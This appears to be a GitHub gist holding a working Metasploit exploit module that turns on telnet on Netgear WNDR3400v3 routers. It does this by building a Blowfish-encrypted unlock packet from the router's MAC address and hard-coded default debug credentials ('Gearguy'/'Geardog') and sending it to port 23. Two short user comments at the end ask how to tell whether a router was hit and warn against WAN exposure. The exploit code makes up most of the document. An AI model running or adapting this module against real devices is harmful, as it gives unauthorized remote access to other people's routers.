Netgear Telnet Enabler
require 'msf/core'
require 'crypt/blowfish' # sorry, openssl is limited to 16-byte key size :(
# add gem 'crypt', '1.1.4' to Gemfile
module ::Crypt
# Re-opens the crypt gem's Blowfish class (pinned to 1.1.4 per the comment
# above) to replace its key schedule. The only functional difference from the
# gem's version is the `.ord` on the key byte, so the code also runs on Ruby
# 1.9, where String#[] returns a one-character String instead of an Integer.
class Blowfish
# Builds the P-array and the four S-boxes from @key.
#
# Reads @key (presumably set by the gem's constructor -- confirm), and the
# gem-provided INITIALPARRAY, INITIALSBOXES, ULONG and encrypt_pair. Nothing
# here validates @key: an empty key makes the `% @key.length` below raise
# ZeroDivisionError, and a nil key raises NoMethodError.
def setup_blowfish()
@sBoxes = Array.new(4) { |i| INITIALSBOXES[i].clone }
@pArray = INITIALPARRAY.clone
keypos = 0
# XOR each of the 18 P-array entries with the next four key bytes, cycling
# through the key as many times as needed.
0.upto(17) { |i|
data = 0
4.times {
data = ((data << 8) | @key[keypos].ord) % ULONG # minor bug fix to the 1.1.4 version (add .ord for 1.9 compat)
keypos = (keypos.next) % @key.length
}
@pArray[i] = (@pArray[i] ^ data) % ULONG
}
# Repeatedly encrypt the running (l, r) pair, starting from zero, with the
# evolving state; each output pair overwrites two entries of the P-array
# first, then two entries of each S-box in turn.
l = 0
r = 0
0.step(17, 2) { |i|
l, r = encrypt_pair(l, r)
@pArray[i] = l
@pArray[i+1] = r
}
0.upto(3) { |i|
0.step(255, 2) { |j|
l, r = encrypt_pair(l, r)
@sBoxes[i][j] = l
@sBoxes[i][j+1] = r
}
}
end
end
end
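class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata and options. The three options feed generate_key directly:
  # the router's LAN MAC plus the debug username/password.
  #
  # NOTE(review): 'DisclosureDate' is kept as the author wrote it, but the
  # framework expects a parseable date string there and its metadata checks
  # will most likely reject this value.
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'NetGear Telnet Enabler',
      # Model name corrected to match the 'Targets' entry below.
      'Description'    => %q{
This module enables the telnet service on NetGear routers. Successfully tested on
a NetGear WNDR3400v3.
},
      'Author'         => [ 'phikshun' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 14774 $',
      'References'     =>
        [
          [ 'NA', 'NA' ],
        ],
      'Platform'       => 'linux',
      'Privileged'     => false,
      'Targets'        =>
        [
          [ 'Netgear WNDR3400v3', { }, ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '0 day, yo'))

    register_options(
      [
        Opt::RPORT(23),
        OptString.new('MAC',  [ true, "The MAC Address of the router LAN interface", nil ]),
        OptString.new('USER', [ true, "The debug username of the router", 'Gearguy' ]),
        OptString.new('PASS', [ true, "The debug password of the router", 'Geardog' ])
      ], self.class)
  end

  # Derives the binary unlock blob from the MAC, username and password.
  #
  # @param mac [String] LAN MAC, with or without '.', '-' or ':' separators
  # @param username [String] debug username
  # @param password [String] debug password; also appended to the Blowfish key
  # @return [String] Blowfish-encrypted blob, 128 bytes for inputs that fit
  #   the 16-byte fields (longer inputs make the plaintext, and so the
  #   result, longer)
  def generate_key(mac, username, password = '')
    # Normalise the MAC to 12 upper-case hex digits. Assign rather than
    # upcase! so the caller's string (datastore['MAC']) is never mutated.
    mac = mac.split(/[\.\-:]/).map { |b| "%02x" % b.to_i(16) }.join('') if mac =~ /[\.\-:]/
    mac = mac.upcase

    # Three NUL-padded 16-byte fields, then the whole thing padded to 0x70.
    just_mac      = mac.ljust(0x10, "\x00")
    just_username = username.ljust(0x10, "\x00")
    just_password = password.ljust(0x10, "\x00")
    cleartext     = (just_mac + just_username + just_password).ljust(0x70, "\x00")

    # MD5(cleartext) || cleartext, padded to 0x80 and byte-swapped per
    # 32-bit word before encryption; the swap is undone again on the output.
    md5_key = OpenSSL::Digest::MD5.digest(cleartext)
    payload = (md5_key + cleartext).ljust(0x80, "\x00").unpack('V*').pack('N*')

    blowfish = Crypt::Blowfish.new("AMBIT_TELNET_ENABLE+" + password)

    # Split into 8-byte blocks with unpack instead of scan(/.{8}/): without
    # the /m flag '.' does not match "\n", so any block containing a 0x0a
    # byte (easily produced by the MD5 digest) was silently dropped, yielding
    # a short, misaligned ciphertext. A trailing partial block is still
    # discarded, as before.
    blocks     = payload.unpack('a8' * (payload.bytesize / 8))
    ciphertext = blocks.map { |b| blowfish.encrypt_block(b) }.join('')
    ciphertext.unpack('V*').pack('N*')
  end

  # Sends the blob once over the TCP socket. Nothing is read back, so the
  # status line only reports that the send completed, not that it worked.
  def exploit
    connect
    begin
      sock.put(generate_key(datastore['MAC'], datastore['USER'], datastore['PASS']))
    ensure
      # Release the socket even if key derivation or the write raises.
      disconnect
    end
    print_status("Unlock key sent -- try telneting to #{rhost}")
  end
end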
neil-s commented Apr 6, 2014

How can I check my router to see if anyone has run this on it? If I simply try to telnet into it from outside, and see a login banner, is that enough to say that telnet has been made responsive on it?

@FrostbittenKing

You should absolutely not make this available on the WAN side. You're asking for trouble, and yes: if you get greeted with the banner and you didn't enable the telnetd yourself, it's safe to assume some $evilguy enabled it.
